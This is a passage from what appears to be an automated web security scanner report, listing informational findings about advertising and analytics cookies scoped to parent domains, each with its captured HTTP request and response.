Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2925993182975414771&mktid=27&mpid=3808468&fpid=-1&rnd=7044539534532983673&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; PUBRETARGET=78_1409703834

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:56:31 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=78_1409703834.82_1409705283; domain=pubmatic.com; expires=Wed, 03-Sep-2014 00:48:03 GMT; path=/
Content-Length: 1
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: text/html


11.24. http://imp.fetchback.com/serve/fb/adtag.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; uid=1_1315097051_1314893682667:5756480826433243; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:54:33 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315097673_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:54:33 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:54:33 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 295

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url=' width='300' heigh
...[SNIP]...

11.25. http://imp.fetchback.com/serve/fb/imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /serve/fb/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=68285&type=mrect&clicktrack=http://optimized-by.rubiconproject.com/t/4462/5032/7102-15.3214998.3237979?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1314893682_16771:0; sit=1_1314893682_3984:0:0; bpd=1_1314893682; apd=1_1314893682; afl=1_1314893682; cre=1_1315097051_34024:68283:2:0:92_34024:68292:2:118888:118970_34023:68293:1:119601:119601; kwd=1_1315097051; scg=1_1315097051; ppd=1_1315097051; act=1_1315097051; uid=1_1315097284_1314893682667:5756480826433243

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:00 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cre=1_1315097700_34021:68285:2:0:415_34024:68283:2:649:741_34024:68292:2:119537:119619_34023:68293:1:120250:120250; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: uid=1_1315097700_1314893682667:5756480826433243; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: kwd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: scg=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: ppd=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Set-Cookie: act=1_1315097700; Domain=.fetchback.com; Expires=Fri, 02-Sep-2016 00:55:00 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Sun, 04 Sep 2011 00:55:00 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5492

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...

11.26. http://leadback.advertising.com/adcedge/lb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=99999&guidm=1:1765ifu1akkc79&bnum=15702 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=/nsYO9aFHYIiGW8sQdwSkaYxSKMCdbdBwB; GUID=MTMxNTA5NzA4NzsxOjE3NjVpZnUxYWtrYzc5OjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:06:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=b8sYO9aFHYIiGT8sQdwSkaMxSKMCdbdBwB; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/
Set-Cookie: GUID=MTMxNTA5ODM5NTsxOjE3NjVpZnUxYWtrYzc5OjM2NQ; domain=advertising.com; expires=Tue, 03-Sep-2013 01:06:35 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Sun, 04 Sep 2011 02:06:35 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.27. http://nmsacramento.112.2o7.net/b/ss/nmsacramento/1/H.20.3/s83257504000794  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nmsacramento.112.2o7.net
Path:   /b/ss/nmsacramento/1/H.20.3/s83257504000794

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/nmsacramento/1/H.20.3/s83257504000794?AQB=1&ndh=1&t=3/8/2011%2019%3A48%3A59%206%20300&pageName=Product%3A%20Blogs%3A%20Moveable%20Type%3A%20Sacramento%20Bee%20--%20The%20State%20Worker&g=http%3A//blogs.sacbee.com/the_state_worker/%23navlink%3Dnavdrop&r=http%3A//www.sacbee.com/2011/09/03/3883102/sprint-could-be-winner-in-thwarted.html&cc=USD&ch=Sacramento%20Bee%3A%20Product%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&server=blogs.sacbee.com&events=event7&c1=http%3A//blogs.sacbee.com/the_state_worker/&h1=SAC%7CSacramento%20Bee%7CNews%7CState%7CGovtPolitics%7C%7C%7CProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&c3=*Product&v3=Cal%20Monthly%20Visit%20Number%3A%201&c4=Sacramento%20Bee%3A%20Moveable%20Type%3A%20Staff%3A%20&v4=Product%3A%20Blogs%3A%20Moveable%20Type%3A%20Sacramento%20Bee%20--%20The%20State%20Worker&c5=.threshold&c6=SAC%7CSacramento%20Bee%7CNews%7CState%7CGovtPolitics%7C%7C%7CProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&c13=Unknown&c20=%7CU%3A%20Sacramento%20Bee%3A%20Product%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker%20%3A%20blogs.sacbee.com&c33=8%3A30PM&c34=Saturday&c39=%20%23navlink%3Dnavdrop&c42=Cal%20Monthly%20Visit%20Number%3A%201&c43=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal&c44=Sto%3A%203000px%20%3A%203sc%20%3A%20100%25&c48=YTextAd%3A%20*Product%3Ablogs.sacbee.com%3AProduct%3A%20Blogs%3A%20Moveable%20Type%3A%20The%20State%20Worker&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1233&bh=1037&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Story%3A%203883102%7CSprint%20could%20be%20winner%20in%20thwarted%20T-Mobile-AT%26T%20deal&pidt=1&oid=http%3A//blogs.sacbee.com/the_state_worker/%23navlink%3Dnavdrop&ot=A&AQE=1 HTTP/1.1
Host: nmsacramento.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 01:04:36 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_bax7Fmox7Emaibxxc=[CS]v4|27316752051606A2-400001778004310F|4E62CAD6[CE]; Expires=Fri, 2 Sep 2016 01:04:36 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sat, 03 Sep 2011 01:04:36 GMT
Last-Modified: Mon, 05 Sep 2011 01:04:36 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E62CEA4-0D28-2AB4C075"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
Location: http://b.scorecardresearch.com/r?c2=6035363&d.c=gif&d.o=nmsacramento&d.x=62294659&d.t=page&d.u=http%3A%2F%2Fblogs.sacbee.com%2Fthe_state_worker%2F%23navlink%3Dnavdrop
xserver: www388
Content-Length: 0
Content-Type: text/plain


11.28. http://optimized-by.rubiconproject.com/a/4462/5032/7102-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-15.js?cb=0.3047261026222259 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; ses15=5032^1&9346^1; csi15=3203911.js^1^1315097079^1315097079; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:53:59 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:53:59 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 04-Sep-2011 01:53:59 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111960; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3214998.js^2^1315097284^1315097639&3203911.js^1^1315097079^1315097079; expires=Sun, 11-Sep-2011 00:53:59 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1133

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3214998"
...[SNIP]...

11.29. http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4462/5032/7102-2.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/4462/5032/7102-2.html HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=5032^1&9346^1; csi2=3214995.js^2^1315096957^1315097051; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rdk=4462/5032; rdk15=0; ses15=5032^2&9346^1; csi15=3214998.js^1^1315097284^1315097284&3203911.js^1^1315097079^1315097079

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:55:23 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Sun, 04-Sep-2011 01:55:23 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^3&9346^1; expires=Mon, 05-Sep-2011 05:59:59 GMT; max-age=111876; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3214995.js^3^1315096957^1315097723; expires=Sun, 11-Sep-2011 00:55:23 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1228

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

11.30. http://pix04.revsci.net/D08734/a1/0/0/0.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEOfruwaKEzWGvrIKzVwqd-c&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=MLv381MJZihrpr4pFtGoS+vQxWHDxijKIfA0nD1YXO8rJ/xUCrr55GtB6tH+GLXHEIQDRgAUsgpjb8Qra3p01ss8sfNs7AbtWw1NMQHbVuHPxDryQTQWihnYn6mP+qW7rJmsUh6JMJetp9XETN/owC1QhOX+6P7c+4riWzBhBBh0hHlQH0Mljz11bOQQy9Po8Tkt4PBjMGKr1Bfz/My2nRuK7D8C6g9uO0ZdIfyxv6GSjZyInaiZGtamS+7APFob9OU4D23sBW1SwUMD/ds2xnVIonlibiNzi17a2Ci3cn7RNBynKV68utYh0Ovmqr8c1tzfmqX4M2kB+/s7Vy40QxV9eDcyPv7QD2ZZMP07MjwVzu7udeJOT3iLHqAcVBo7UzkvOQovXwg7LkXZVvP1mraXg37hy1xUW9h5fCe5b9lSBlAtX2RjJNd5Kw/DAkI9jR+sOwx5I7QhIO08XzQPAbHeq4X/4/G0hBZxKEA2Dct7ZBd0mftbvhhLi6d9lWU1WG1lXuk4y9NKwM0va2Xyz1Lw09OQZDgIyy1zGMeZrZJg+kwRvgMeIDktJKjBuIf97ZXzLsztk2vWivgmeYpKxJ4wDUGU0S3gU3ABHH8jewoHoUlhxqkQ8jkYD7qVT3LNbOp3PtSUgFgciO/JNV+meBiEZQothOKfU9FUkikghycwnLz4dZuMaSAN/NiLtCNgyxyFJ1pETrJ2iDIwVq101NqbmoFi5OtWvxLh+LOggQVGUKjrcv23bOh6jKQKA8zm/ZYtlTuIqd29QjhV72qNCBkQ0CSsYM/3t7TWnuY9MyASx/5TAztlXKLOg1CAtnJp6ROGov+uw97/AjXH5vzpzlW3bxeSnTaVnDLl5KfroKP5t54TABTyBmMfFNAgoKocMu1r1A0by7U0KerVjRkpDPYNv+su9A5dE4Scx2rJSZTQhGqljz7gnt6TmRr/GY3c4ui3vQztSENzi19mPoa0Q3nd4G8BNsuMvXYo5lUc/gzYQhq5MSpuRIP/Y5jCxpM=; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; rsiPus_p40C="MLtXrtMvti9nYAD3bv6uJZDWPvAb5rmAbOC1vSsaeKCIpRg1Q0dHTe55BQsYxevmIbNHamJI0N8JSN5tTqULMCjmqoEZiTVnsWkDuaFDB3Wxsgb+dqUDsAhR88Y8/tbo5errEJSJyxK5oqjOi7yC6LapAKMgm87tdc9sJe+K+S51tsgcNG0yafNyT3Mj6ez3yHCqVDZl3JSrA7SGDKtmSqnlcl/KTuqikN3SUl2KPkpJFQVc3m7etpySLFnZBwIjKh7tGEbtQyeLQjD5a5oobWtv9loXNaHqohXE75f1bUXMWji8BYpbX/ehxZr8ddKQTQMDPFg="; rsi_us_1000000="pUMdJT+nPwIU1E3iQFs1Lw7NfjtDG6P2dL1poyhgAWP5Eo4es3kaxW1feZP1YNm+vskrklkV+oIYNjONkByQANVsWNI2LUQx8TCq2WGPl5VXzYIGTGOuqjioCwYxcCLHmCkxz4ESp094zcjlIQUTzGncppB8+UZ13jX8XjRx0I3BL+KAGqLYtL1yR5cosgVr9TChjigtCT7xLSmTxoSu7GRigj7TGlm9TWroY0Q39+iNlTc3BrdjBe0HTkWYH0ShlG+acfzLReAv8qXohHLhe5F9dMgHJSO83a8oSnKmeKGYbW9i7MxX9f9dHDkI4yUr7YhzEgSpDzIQoN8mjvDq8uAicdwkS3Vj6tHxg4FjZP5oJKn7RMzXdrHwiAm5HkJNNq7rKZe60tdAVpLfFLIZU2NXYF5Ng4nUe9B7vLt/JeKgOkuoMXRBd9LPrc+/Bs4Zy2M8IMqrZma4/6vOjeaSPoErPG5h9v54soIwRm/p6mPbNHPXqMGI6iAEpBp39vZnCJ8TPcPuiSkxaucITwjR4ls8ahmnjLIaytIoGLCJ/Gk+WsM5cUzAfduzHzcfr1tiWa348TV6PwF3eayssB/NpybGnJ4mkGwbtdvs76dMdYRClhQnokDRRFqfqHlR5S6hY3Cufhpq2otZn8gHLLXi0UYaHuTtyjHcoW9gZagVsKBU5RI+04gGuvIwxRnBEKwniHi8ZYHXm0BGAaf2rvKUw7FcsM1MDjjAtYrWzUobzJubFmLscTjITZE83wdVVKbPTHCW+E6UqZY3vs2GJOkpG7gaCzt7i/PmMgRey9Ep7w5TQuNKaPbYm0+V7iZOGAnsWlpG0D2TcSxjX6nkaxa+P0zbU7mixMT1h5TkHQHrU4mEOBygWqOWYZoz2ReGBIBfVZfHHBb73A=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOM9CLgIMVZ94v40baTDzlRIkdUWSQGfFxfA6hPpUKyeNNoj0iIN6Cv9sUGvLEXvKAFu9JT7uIABOODftm+QaDSbsuf25QFhAJtgIo+GwOzrVo4YkL0xbKLuQiu28WRitUy3Kb67rhK+xW853LY2RBECs8dSNYOibsRLGdMUdsI2f//Emd6k6iE1p2Wou0rWthgALXeX8ILkdmFAdhV3cQvpFqMGLq/eFx91Js8rLMz0cCNgkRarHvfvZ2ZEHYUfwWV/ukw==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvvNSMJaSpn3g1FoZH0RlrFVGlLZikvZx25PXJmUCGL98grjFJqCCNpB/yeIe8tiuuU7DwV9uJRcKHDIz5sfLNLUI1v7CtFzyMjtMVqchuMirh+fVYDSTx6kYYD35s1jl+stYqc8GsQe73ckgkbu4VWrKeX2B7cZ/1seHrobMMUM7L5reZTF5m4zcGRkreyO0EKX5Wx+FYENxQ5/aj2i3QTfKgHhOu0nW8f+tcshhAFgqgczjwKnptz4DLwfWySzFP5wVwM+5ZURb4Sl1CQqxFIoYHaB2U9bktv+VgMOU1ZBee+imwg7hUw1OM10Z7Em8yut0h38HT+0e404C0cOgQ24hBYw+TwFcPjx+ASIPZ36/rWPXN2lf6nqHyamgPG4SqEkq2WG8fzc0B9GkS0nT8ZVWwOabJvEkykzFF/+8Xxh/nYZE24yORkcXIy5PEin+j+o4l6I1NJAcwDJ8vbDb/MmtGGNaqd4AwDZ2Ijc/ZToTiK4Aukkj/LvsuziPG4IRvM8nf6rJbqLkWwFcaoXY7vUst/Gg7Xa/xavuUFDKvbHfCv+1yPk1dz/PYvygr/Rk6zsIJQ0P6z3IwJM+in9OuPRJ7QjHK7ndiF0mmCNutid8vPaEnygJPqBzs8EBCS1ptxgc9OPXaSPNOKhLwQxDDEpVmulh6B5oui82z2SVApQ+wHGfpaE6FtnRZDJmB4Lu3g88cANQsQfz22xW2pBk3b2fh0eYCd+/SrmquMLKZIXY06i4xZwMRGHhgPLCUALAq30j4PGNG8Lbs9O2o6pNGNryL/rXvzbEoDigpJG/nBFqh5HNOUAogER7G+UaHbFrPGha5Y+7kZW/nX50pKipg1eovzW42n/IOT7s0hqTfUt28mej2z+FtSCUM+L6+DOlRsWrQSt8O1Kq+P9ltbJmQtL5TUx2Lgd+Bs9sQsWdHWq+XJbVGcxXX5x5elPlkKPibM4IAdr0tgvSiBju8YRaVhLjbin/Y11hrducFcz94sD8qVh5g6z0VOhRdx4D6z0K8VoqgdqQaEAPBw5MwfMp8KaH64wOmvQxMYEBvDsc5uANyIHQHbFXbGz51NIVTekUt9BdWxFLyXvli2OK+iH/+O6NeH3pqas2pk/Tu07l/CoXE0ZEV80c/FleVQoq1ZQY3G9OSTCcZMQVECZND0NsMxYGPs0BohuXdlJw==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:52:31 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 04 Sep 2011 00:52:30 GMT

GIF89a.............!.......,...........D..;

